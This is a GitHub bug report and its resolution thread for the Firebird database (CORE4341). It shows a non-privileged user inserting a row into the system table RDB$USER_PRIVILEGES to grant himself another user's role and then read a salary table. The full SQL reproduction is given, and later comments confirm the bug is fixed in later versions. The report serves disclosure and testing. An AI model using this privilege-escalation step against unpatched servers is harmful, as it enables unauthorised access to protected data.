Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Non-privileged user can grant other's role to himself [CORE4341] #4663

Closed
firebird-automations opened this issue Feb 15, 2014 · 7 comments
Closed

Comments

@firebird-automations
Copy link
Collaborator

Submitted by: @pavel-zotov

Votes: 1

SQL> create database 'sec.fdb';
SQL> drop user boss; -- if exists...
SQL> drop user zero; -- if exists...

SQL> create user boss password 'boss'; -- this user CAN access to some data
SQL> create user zero password 'zero'; -- this is non-privileged user

SQL> create role rboss;
SQL> create role rzero;

SQL> grant rboss to boss;
SQL> grant rzero to zero;

SQL> create table salary(id int, s int);
SQL> insert into salary values(1, 1000);
SQL> commit;
SQL> grant all on salary to rboss; -- we grant access only to this role; NOT to role 'RZERO' !
SQL> commit;
SQL> quit;

----------------

-- now check that user BOSS can view and edit table SALARY via role RBOSS:
$ /opt/fb30trnk/bin/isql /var/db/fb30/sec.fdb -user boss -pas boss -role RBOSS
Database: /var/db/fb30/sec.fdb, User: boss, Role: RBOSS
SQL> set list on;
SQL> select current_user,current_role from rdb$database;

USER BOSS
ROLE RBOSS

SQL> select * from salary;

ID 1
S 1000

SQL> update salary set s=2000 where id=1;
SQL> insert into salary values(2,2222);
SQL> commit;
SQL> select * from salary;

ID 1
S 2000

ID 2
S 2222

-- that's OK.
SQL> exit;

-------------------------------------

-- now connect as non-privileged user 'ZERO' (specifying his role is optional; result is the same):

$ /opt/fb30trnk/bin/isql /var/db/fb30/sec.fdb -user zero -pas zero
Database: /var/db/fb30/sec.fdb, User: zero
SQL> show role;
RBOSS RZERO

SQL> show table;
SALARY

SQL> select * from salary;
Statement failed, SQLSTATE = 28000
no permission for SELECT access to TABLE SALARY -- OK, it should be such

-- and now we insert new record in system table RDB$USER_PRIVILEGES (we CAN do this!)
-- NB: we can add row either NOT specifying value for RDB$GRANTOR field or set it = 'ZERO' (i.e. current user):

SQL> insert into rdb$user_privileges(rdb$user,rdb$privilege,rdb$relation_name,rdb$user_type,rdb$object_type)
CON> values( 'ZERO', 'M', 'RBOSS', 8, 13 ); -- PASSED! Why ??

SQL> commit;

SQL> connect '/var/db/fb30/sec.fdb' user zero password 'zero' role 'RBOSS';
Database: '/var/db/fb30/sec.fdb', User: zero, Role: RBOSS
SQL> set list on;
SQL> select current_user,current_role from rdb$database;

USER ZERO -- i'm connect as non-privileged user...
ROLE RBOSS -- ...but i HAVE grated to role of the BOSS (and I did it myself)

-- final check:
SQL> select * from salary;

ID 1
S 2000

ID 2
S 2222

SQL> show version;
ISQL Version: LI-T3.0.0.30876 Firebird 3.0 Alpha 2
Server version:
Firebird/Linux/AMD/Intel/x64 (access method), version "LI-T3.0.0.30876 Firebird 3.0 Alpha 2"
on disk structure version 12.0

====== Test Details ======

See test for CORE4731 ("Prohibit an ability to issue DML or DDL statements on RDB$ tables").
Currently (31-aug-2020) there are only 23 statements which can do direct modification against RDB$ tables and must be allowed - see them in core_4731.fbt
No table RDB$USER_PRIVILEGES among them.

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

Version: 3.0 Alpha 1 [ 10331 ]

Version: 2.5.2 Update 1 [ 10521 ]

Version: 2.1.5 Update 1 [ 10522 ]

Version: 2.5.2 [ 10450 ]

Version: 2.1.5 [ 10420 ]

Version: 2.5.1 [ 10333 ]

Version: 2.1.4 [ 10361 ]

Version: 2.5.0 [ 10221 ]

Version: 2.1.3 [ 10302 ]

Version: 2.1.2 [ 10270 ]

Version: 2.1.1 [ 10223 ]

Version: 2.1.0 [ 10041 ]

Component: Engine [ 10000 ]

summary: non-privileged user can grant other's role to himself => Non-privileged user can grant other's role to himself

@firebird-automations
Copy link
Collaborator Author

Commented by: @pavel-zotov

PS. Result is the same both to embedded and remote (via TCP) connections.

[root@oel64 23:16:20 fb30]$ /opt/fb30trnk/bin/isql localhost/3333:/var/db/fb30/sec.fdb -user zero -pas zero -role RZERO
Database: localhost/3333:/var/db/fb30/sec.fdb, User: zero, Role: RZERO
SQL> set list on; select current_user,current_role from rdb$database;

USER ZERO
ROLE RZERO

SQL> insert into rdb$user_privileges(rdb$user,rdb$privilege,rdb$relation_name,rdb$user_type,rdb$object_type)
CON> values( 'ZERO', 'M', 'RBOSS', 8, 13 ); -- PASSED!
SQL> commit;

SQL> select mon$remote_protocol,mon$remote_version,mon$client_version,mon$auth_method from mon$attachments where mon$attachment_id=current_connection;

MON$REMOTE_PROTOCOL TCPv4
MON$REMOTE_VERSION P13
MON$CLIENT_VERSION LI-T3.0.0.30876 Firebird 3.0 Alpha 2
MON$AUTH_METHOD Legacy_Auth

SQL> select * from salary;
Statement failed, SQLSTATE = 28000
no permission for SELECT access to TABLE SALARY -- this is because current role is RZERO rather than RBOSS
SQL> quit;

-- But:
$ /opt/fb30trnk/bin/isql localhost/3333:/var/db/fb30/sec.fdb -user zero -pas zero -role RBOSS
Database: localhost/3333:/var/db/fb30/sec.fdb, User: zero, Role: RBOSS
SQL> set list on; select current_user,current_role from rdb$database;

USER ZERO
ROLE RBOSS -- <<<< NB <<<<<

SQL> select * from salary;

ID 1
S 1000

ID 2
S 2222

@firebird-automations
Copy link
Collaborator Author

Modified by: @dyemanov

assignee: Alexander Peshkov [ alexpeshkoff ]

@firebird-automations
Copy link
Collaborator Author

Commented by: @AlexPeshkoff

Currently for both B3_0 & master I get:

#⁠ ./isql -user zero employee
Database: employee, User: ZERO
SQL> insert into rdb$user_privileges(rdb$user,rdb$privilege,rdb$relation_name,rdb$user_type,rdb$object_type) values( 'ZERO', 'M', 'RBOSS', 8, 13 );
Statement failed, SQLSTATE = 28000
no permission for UPDATE access to TABLE RDB$RELATION_FIELDS
SQL>

Is it OK to close ticket?

@firebird-automations
Copy link
Collaborator Author

Commented by: @pavel-zotov

I've checked on WI-V3.0.7.33358; WI-V4.0.0.2185 -- all OK.
Ticket is to be closed.

@firebird-automations
Copy link
Collaborator Author

Modified by: @pavel-zotov

status: Open [ 1 ] => Closed [ 6 ]

resolution: Fixed [ 1 ]

@firebird-automations
Copy link
Collaborator Author

Modified by: @pavel-zotov

status: Closed [ 6 ] => Closed [ 6 ]

QA Status: Covered by another test(s)

Test Details: See test for CORE4731 ("Prohibit an ability to issue DML or DDL statements on RDB$ tables").
Currently (31-aug-2020) there are only 23 statements which can do direct modification against RDB$ tables and must be allowed - see them in core_4731.fbt
No table RDB$USER_PRIVILEGES among them.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment